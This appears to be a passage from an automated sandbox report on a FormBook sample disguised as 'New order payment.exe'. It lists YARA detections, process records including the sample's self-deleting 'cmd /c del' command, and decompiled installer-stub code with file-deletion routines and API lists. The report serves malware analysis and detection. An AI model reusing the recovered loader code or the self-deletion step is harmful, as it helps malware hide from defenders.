                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: cmd.exe PID: 6196 Parent PID: 2600

                                                              General

                                                              Start time:16:19:31
                                                              Start date:27/10/2021
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:/c del 'C:\Users\user\Desktop\New order payment.exe'
                                                              Imagebase:0x150000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: conhost.exe PID: 6204 Parent PID: 6196

                                                              General

                                                              Start time:16:19:32
                                                              Start date:27/10/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7ecfc0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >

                                                                Analysis Process: New order payment.exe PID: 4912 Parent PID: 6088 New order payment.exeCOMMON

                                                                Executed Functions

                                                                Function 004030FB, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315stringfilecomCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 78%
                                                                			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F28(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030CA(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403511();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x423fd4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x423fec; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F28(5);
											_t119 = E00405F28(6);
											_t67 = E00405F28(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F28(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x423f5c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x423fec =  *0x423fec | 0xffffffff;
										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
										goto L37;
									}
									_t123 = E004056B6(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E004053E0(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\alfons\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\alfons\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053C3();
											} else {
												E00405346();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t127);
											}
											E00405B98(0x425000,  *(_t129 + 0x20));
											 *0x425400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x423f50; // 0x771a18
												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x41f0f0);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\alfons\\Desktop\\New order payment.exe", 0x41f0f0, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x41f0f0);
														E004058E6(_t149);
														_t93 =  *0x423f50; // 0x771a18
														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E004053F8(0x41f0f0);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E004058E6(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040576C(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
									E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030CA(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EBA(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F28(0xd);
					_t47 = E00405F28(0xb);
					 *0x423f44 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x423ff8 = _t47;
					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405B98("ebykawqyaa Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\alfons\\Desktop\\New order payment.exe\" ";
					E00405B98(_t125, _t51);
					 *0x423f40 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\alfons\\Desktop\\New order payment.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M0042A001;
					}
					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                                                                0x0040310c
                                                                0x00403110
                                                                0x00403118
                                                                0x0040311c
                                                                0x00403121
                                                                0x00403131
                                                                0x00403134
                                                                0x0040313b
                                                                0x00403142
                                                                0x00403142
                                                                0x0040313b
                                                                0x00403144
                                                                0x00403144
                                                                0x0040325a
                                                                0x0040325a
                                                                0x0040325a
                                                                0x0040325c
                                                                0x0040325e
                                                                0x00000000
                                                                0x00000000
                                                                0x004031f3
                                                                0x004031f6
                                                                0x004031fe
                                                                0x004031fe
                                                                0x00403201
                                                                0x00403206
                                                                0x00403208
                                                                0x00403208
                                                                0x00403209
                                                                0x00403209
                                                                0x0040320e
                                                                0x00403211
                                                                0x0040324a
                                                                0x0040324f
                                                                0x00403254
                                                                0x00403257
                                                                0x00403259
                                                                0x00403259
                                                                0x00403259
                                                                0x00000000
                                                                0x00403213
                                                                0x00403213
                                                                0x00403214
                                                                0x00403217
                                                                0x0040321f
                                                                0x00403222
                                                                0x00403224
                                                                0x00403224
                                                                0x00403224
                                                                0x00403224
                                                                0x00403222
                                                                0x00403229
                                                                0x0040322f
                                                                0x00403237
                                                                0x0040323a
                                                                0x0040323c
                                                                0x0040323c
                                                                0x0040323c
                                                                0x0040323c
                                                                0x0040323a
                                                                0x00403241
                                                                0x00403248
                                                                0x00403262
                                                                0x00403265
                                                                0x00403265
                                                                0x0040326e
                                                                0x00403273
                                                                0x00403273
                                                                0x0040327e
                                                                0x00403284
                                                                0x00403289
                                                                0x0040328b
                                                                0x004032b1
                                                                0x004032b6
                                                                0x004032c0
                                                                0x004032c7
                                                                0x004032cb
                                                                0x00403332
                                                                0x00403332
                                                                0x00403337
                                                                0x0040333d
                                                                0x00403341
                                                                0x00403456
                                                                0x0040345c
                                                                0x004034f9
                                                                0x004034f9
                                                                0x004034fe
                                                                0x00403501
                                                                0x00403503
                                                                0x00403503
                                                                0x0040350b
                                                                0x0040350b
                                                                0x0040346b
                                                                0x00403474
                                                                0x00403476
                                                                0x0040347b
                                                                0x0040347d
                                                                0x0040347f
                                                                0x00403481
                                                                0x00403483
                                                                0x00403485
                                                                0x00403487
                                                                0x00403497
                                                                0x00403499
                                                                0x0040349b
                                                                0x004034a8
                                                                0x004034b7
                                                                0x004034bf
                                                                0x004034c7
                                                                0x004034c7
                                                                0x0040349b
                                                                0x00403487
                                                                0x00403483
                                                                0x004034cb
                                                                0x004034d0
                                                                0x004034d7
                                                                0x004034e5
                                                                0x004034e8
                                                                0x004034ee
                                                                0x004034f0
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004034d9
                                                                0x004034df
                                                                0x004034e1
                                                                0x004034e3
                                                                0x004034f2
                                                                0x004034f4
                                                                0x00000000
                                                                0x004034f4
                                                                0x00000000
                                                                0x004034e3
                                                                0x004034d7
                                                                0x00403350
                                                                0x00403357
                                                                0x00403357
                                                                0x004032cd
                                                                0x004032d3
                                                                0x00403322
                                                                0x00403322
                                                                0x0040332e
                                                                0x00000000
                                                                0x0040332e
                                                                0x004032dc
                                                                0x004032e9
                                                                0x004032e0
                                                                0x004032e6
                                                                0x00000000
                                                                0x00000000
                                                                0x004032e8
                                                                0x004032e8
                                                                0x004032e8
                                                                0x004032ed
                                                                0x004032ef
                                                                0x004032f7
                                                                0x00403368
                                                                0x0040336a
                                                                0x00403371
                                                                0x00403379
                                                                0x00403379
                                                                0x00403384
                                                                0x00403389
                                                                0x00403398
                                                                0x0040339c
                                                                0x0040339d
                                                                0x004033a6
                                                                0x0040339f
                                                                0x0040339f
                                                                0x0040339f
                                                                0x004033ac
                                                                0x004033b2
                                                                0x004033b8
                                                                0x004033c0
                                                                0x004033c0
                                                                0x004033ce
                                                                0x004033d5
                                                                0x004033de
                                                                0x004033e4
                                                                0x004033e4
                                                                0x004033f0
                                                                0x004033f6
                                                                0x00403400
                                                                0x0040340a
                                                                0x00403410
                                                                0x00403412
                                                                0x00403414
                                                                0x00403415
                                                                0x00403416
                                                                0x0040341b
                                                                0x00403427
                                                                0x0040342d
                                                                0x00403434
                                                                0x00403437
                                                                0x0040343d
                                                                0x0040343d
                                                                0x00403434
                                                                0x00403412
                                                                0x00403441
                                                                0x00403447
                                                                0x00403447
                                                                0x00403447
                                                                0x0040344a
                                                                0x0040344b
                                                                0x0040344c
                                                                0x0040344c
                                                                0x00000000
                                                                0x00403398
                                                                0x004032f9
                                                                0x004032fb
                                                                0x00403306
                                                                0x00000000
                                                                0x00000000
                                                                0x0040330e
                                                                0x00403319
                                                                0x0040331e
                                                                0x00000000
                                                                0x0040331e
                                                                0x00403293
                                                                0x0040329f
                                                                0x004032a4
                                                                0x004032a9
                                                                0x004032ab
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403248
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004031f8
                                                                0x004031f8
                                                                0x004031f8
                                                                0x004031f9
                                                                0x004031f9
                                                                0x00000000
                                                                0x004031f8
                                                                0x00000000
                                                                0x00403149
                                                                0x0040314a
                                                                0x00403156
                                                                0x0040315c
                                                                0x00000000
                                                                0x0040315e
                                                                0x00403160
                                                                0x00403167
                                                                0x0040316c
                                                                0x00403171
                                                                0x00403178
                                                                0x0040317e
                                                                0x00403194
                                                                0x004031a4
                                                                0x004031a9
                                                                0x004031af
                                                                0x004031b6
                                                                0x004031c9
                                                                0x004031ce
                                                                0x004031d0
                                                                0x004031d2
                                                                0x004031d7
                                                                0x004031d7
                                                                0x004031e7
                                                                0x004031ed
                                                                0x00000000
                                                                0x004031ed

                                                                APIs
                                                                • SetErrorMode.KERNEL32 ref: 00403121
                                                                • GetVersion.KERNEL32 ref: 00403127
                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                                                • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                                                • OleInitialize.OLE32(00000000), ref: 00403178
                                                                • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                                                • GetCommandLineA.KERNEL32(ebykawqyaa Setup,NSIS Error), ref: 004031A9
                                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\New order payment.exe" ,00000000), ref: 004031BC
                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\New order payment.exe" ,00409168), ref: 004031E7
                                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040327E
                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                                                • DeleteFileA.KERNEL32(1033), ref: 004032B6
                                                                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                • OleUninitialize.OLE32(00000020), ref: 00403337
                                                                • ExitProcess.KERNEL32 ref: 00403357
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\New order payment.exe" ,00000000,00000020), ref: 0040336A
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\New order payment.exe" ,00000000,00000020), ref: 00403379
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\New order payment.exe" ,00000000,00000020), ref: 00403384
                                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\New order payment.exe" ,00000000,00000020), ref: 00403390
                                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                                                • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\New order payment.exe,0041F0F0,00000001), ref: 0040340A
                                                                • CloseHandle.KERNEL32(00000000,0041F0F0,0041F0F0,?,0041F0F0,00000000), ref: 00403437
                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                                                • ExitWindowsEx.USER32 ref: 004034E8
                                                                • ExitProcess.KERNEL32 ref: 0040350B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\New order payment.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New order payment.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$ebykawqyaa Setup$~nsu
                                                                • API String ID: 3469842172-2123447831
                                                                • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                                • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                                                • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                                • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004054BD, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040576C(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423fc8 =  *0x423fc8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B98(0x421540, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056D2(_t72);
					} else {
						lstrcatA(0x421540, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421540,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405850(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E84(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423fc8 =  *0x423fc8 + 1;
										} else {
											E00404E84(0xfffffff1, _t72);
											E004058E6(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054BD(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421540 - 0x5c;
					if( *0x421540 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E93(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040568B(_t72);
							E00405850(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E84(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E84(0xfffffff1, _t72);
							return E004058E6(__eflags, _t72, 0);
						}
						L33:
						 *0x423fc8 =  *0x423fc8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                0x004054c8
                                                                0x004054cc
                                                                0x004054d5
                                                                0x004054d8
                                                                0x004054db
                                                                0x004054e3
                                                                0x004054e5
                                                                0x004054e6
                                                                0x00000000
                                                                0x004054e6
                                                                0x004054f5
                                                                0x004054f5
                                                                0x004054f8
                                                                0x004054fb
                                                                0x0040550f
                                                                0x00405516
                                                                0x0040551b
                                                                0x0040551d
                                                                0x0040552d
                                                                0x0040551f
                                                                0x00405525
                                                                0x00405525
                                                                0x00405532
                                                                0x00405535
                                                                0x00405540
                                                                0x00405546
                                                                0x0040554b
                                                                0x0040555b
                                                                0x0040555d
                                                                0x00405563
                                                                0x00405566
                                                                0x00405569
                                                                0x00405626
                                                                0x00405626
                                                                0x0040562a
                                                                0x0040562c
                                                                0x0040562c
                                                                0x0040562c
                                                                0x0040562c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0040556f
                                                                0x0040556f
                                                                0x00405578
                                                                0x0040557e
                                                                0x00405583
                                                                0x00405586
                                                                0x00405588
                                                                0x0040558c
                                                                0x0040558e
                                                                0x0040558e
                                                                0x0040558c
                                                                0x00405591
                                                                0x00405594
                                                                0x004055a7
                                                                0x004055a9
                                                                0x004055ae
                                                                0x004055b5
                                                                0x004055cd
                                                                0x004055d3
                                                                0x004055d9
                                                                0x004055db
                                                                0x00405600
                                                                0x004055dd
                                                                0x004055dd
                                                                0x004055e1
                                                                0x004055f5
                                                                0x004055e3
                                                                0x004055e6
                                                                0x004055ee
                                                                0x004055ee
                                                                0x004055e1
                                                                0x004055b7
                                                                0x004055bd
                                                                0x004055bf
                                                                0x004055c5
                                                                0x004055c5
                                                                0x004055bf
                                                                0x00000000
                                                                0x004055b5
                                                                0x00405596
                                                                0x00405599
                                                                0x0040559b
                                                                0x00000000
                                                                0x00000000
                                                                0x0040559d
                                                                0x0040559f
                                                                0x00000000
                                                                0x00000000
                                                                0x004055a1
                                                                0x004055a5
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00405605
                                                                0x0040560f
                                                                0x00405615
                                                                0x00405615
                                                                0x00405620
                                                                0x00000000
                                                                0x00405620
                                                                0x00405537
                                                                0x0040553e
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004054fd
                                                                0x004054fd
                                                                0x004054ff
                                                                0x00405630
                                                                0x00405633
                                                                0x00405636
                                                                0x00405688
                                                                0x00405688
                                                                0x00405688
                                                                0x00405638
                                                                0x0040563b
                                                                0x00405646
                                                                0x0040564b
                                                                0x0040564d
                                                                0x00000000
                                                                0x00000000
                                                                0x00405650
                                                                0x00405656
                                                                0x0040565c
                                                                0x00405662
                                                                0x00405664
                                                                0x00000000
                                                                0x00405680
                                                                0x00405666
                                                                0x0040566a
                                                                0x00000000
                                                                0x00000000
                                                                0x0040566f
                                                                0x00000000
                                                                0x00405676
                                                                0x0040563d
                                                                0x0040563d
                                                                0x00000000
                                                                0x0040563d
                                                                0x00405505
                                                                0x00405509
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00405509

                                                                APIs
                                                                • DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                                                • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
